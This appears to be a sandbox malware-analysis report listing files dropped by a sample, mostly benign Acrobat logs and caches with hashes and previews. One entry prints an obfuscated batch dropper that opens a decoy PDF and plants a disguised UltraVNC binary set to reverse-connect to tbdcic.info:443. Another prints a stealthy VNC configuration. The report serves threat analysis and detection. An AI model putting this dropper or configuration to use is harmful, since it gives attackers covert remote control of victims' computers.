SSDEEP:	24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp2xf4zJwtNBwtNbRZ6bRZ45xfF:TVl2GL7ms6ggOVp9zutYtp6P8
MD5:	03C7ECFF221663DF33FBC0E69F96DCB4
SHA1:	567BA52614AC38A63E7AF15455074E9C0C49CE48
SHA-256:	27323B536345128B1C48580F8F08B03915900617AB0450CB908C274B4B751A0F
SHA-512:	4C0544DA9F2563E5CC6D0969E90BD2E15E0BED9B5E971F3182AE509EA2D92C32B04516C1117935CC19FFEED1799BAF40AE222F72B0D38BB30D12E6E1C40D394C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.3406207947555013
Encrypted:	false
SSDEEP:	24:7+tSmAD1RZKHs/Ds/Sp2xfPzJwtNBwtNbRZ6bRZWf1RZKXqLBx/XYKQvGJF7urs0:7MSmGgOVpmzutYtp6PMaqll2GL7ms0
MD5:	D62BD0373AF1FFD5A2A1E15DA8BC689B
SHA1:	C0C5B4669CBAF387364FA6B601079AE8BD19BB24
SHA-256:	FB61C8292D4C46F0844B4A389B109D1458A114D93139B4AFA55916750195C0B8
SHA-512:	82DD2CC9CA67F8F2EEA9347C400E8F95134040D1EE01AF97DC6225178BB80880F6D72C13E82C60EE7AC17E44B3F2262B766FC7F20ADB8DC4291F742F7B5C13B4
Malicious:	false
Preview:	.... .c........P......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEg7jWMp61bx5bQxUIY0gwP47SYyu:6a6TZ44ADE7jfE1bbbQxOSK
MD5:	54CF51588C67985A85F574D62ADA8826
SHA1:	E3E611A8B9F0B3809BC27DD4054D93FF737C3FA2
SHA-256:	1EF8DF8C8823C68BEE9716D9C1E9F16636954FF543460C59B5C93EBFA83B7FAA
SHA-512:	40ABCDC9D4CA103C21A53CC96FE949F3BFF05F2FAF1B2F14E34D5E69235B5E4F5E009AABE79E97F620737DE8A3FAE90FC7C29EB24D78DC5D854D3ACBD8CC2A62
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\4735396734841324

Download File

Process:	C:\Users\user\Desktop\mSRW5AfJpC.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.649012890742747
Encrypted:	false
SSDEEP:	24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
MD5:	1BE7E5C957D00F505D8F9916CF850EE9
SHA1:	FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
SHA-256:	FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
SHA-512:	292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\B7MqI9.IYF1N0

Download File

Process:	C:\Users\user\Desktop\mSRW5AfJpC.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I

Download File

Process:	C:\Users\user\Desktop\mSRW5AfJpC.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7q551ugrWe.exe, Detection: malicious, Browse Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU

Download File

Process:	C:\Users\user\Desktop\mSRW5AfJpC.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7q551ugrWe.exe, Detection: malicious, Browse Filename: T8xrZb7nBL.exe, Detection: malicious, Browse Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ndymzn.PPYh2u

Download File

Process:	C:\Users\user\Desktop\mSRW5AfJpC.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Users\user\AppData\Local\Temp\MSI36b29.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.518261198325562
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAk9:Qw946cPbiOxDlbYnuRKDlD9
MD5:	D59706F662008202BAAF1F7AE9D25ACE
SHA1:	AF41FA28C39D61C6E6BA46C9E764BF76B147C9B7
SHA-256:	307F7751C7917E67C3A8F2EB879077977A0EF0193D341C6461FEF9A3C8225121
SHA-512:	2D9135C4D09FF1843F5096806F48F4F099097518742D901B42934E26E709D50FF40C64FB3430305E40D7B3A0FD7716FF69AF9459EC347F8A4B255ED40CB4C336
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.7.:.3.5. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-37-29-085.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.376360055978702
Encrypted:	false
SSDEEP:	384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
MD5:	1336667A75083BF81E2632FABAA88B67
SHA1:	46E40800B27D95DAED0DBB830E0D0BA85C031D40
SHA-256:	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
SHA-512:	D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
Malicious:	false
Preview:	SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15112
Entropy (8bit):	5.365577654614899
Encrypted:	false
SSDEEP:	384:07fUZUkUBUrUCUnPU6UpU/FSFgFDu8GuJu+4s4A5C5GS5SFSASjSzdfQfwfCbsw3:y7A
MD5:	79E82B74A6F4E7C37E43B303F6D3B2A8
SHA1:	16C8CBA3AAF8E6D6EBAA0C7F54633B27434AEB9E
SHA-256:	1243B27A071895A6C4CF9B2EAE2CDB69878256352D90E4676A1DB95A70103BBF
SHA-512:	BCE88C8B733237FB85F1A0CB155BFC917DEA02BE9324F377550AD31D9D3C0BDE8BFB443F73843B7050A2598C122B15CECBF932BB961D931831D998BE622C08AE
Malicious:	false
Preview:	SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:111-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.402047023177553
Encrypted:	false
SSDEEP:	768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbb:v
MD5:	4D5931BFD549B263BE5CC503785A5557
SHA1:	F6A058FFA7AF8109BF285D8EA51D4A5CC2576C21
SHA-256:	49F8EA347A54C305436914BF4BAC3F1FCF681F18290ACF9BB64E6D28FBE406D8
SHA-512:	BC95C5931BC3A54BE104A9D5820407B18A619AFA3AC687F34E5B4CEB1A961092935535FE55F214CAB0FA653F3AA9781777196DC589D6C695E060CF30A8208255
Malicious:	false
Preview:	04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : *************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***********************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\08c858d3-121d-45c4-850a-8001c77246a6.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\355da85a-f8e1-4093-b00b-a5cab874b9d7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru
MD5:	CDB0A9F62FD4871F0603FBBF1FE6BD06
SHA1:	C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24
SHA-256:	85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F
SHA-512:	7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\5cff22b7-0c74-4d03-9cd8-f73de896fe5f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xLtwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JJwZG5WLxB3mlind9i4ufFXpAXkrfUsb
MD5:	D38CB76360DDA78820460E5C5F20061C
SHA1:	F2B65831130B70F2A3DC345F70C4BEEDE9AB40E8
SHA-256:	55E70B5D5F8BE28D648BCDFE7DEB02BF4BBE2F626D620D4D838E0FA4FBF45F8E
SHA-512:	5E31738169A6FE92062B0E582489DEEAC2FA1798965DED94EFA994965470A15B5095851701E4DF631C5EC4454913272F1156EC46B32DA782D3C0F9E490C129A1
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\c3768ca5-bdf5-4bb0-92ad-03450f0aa7da.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
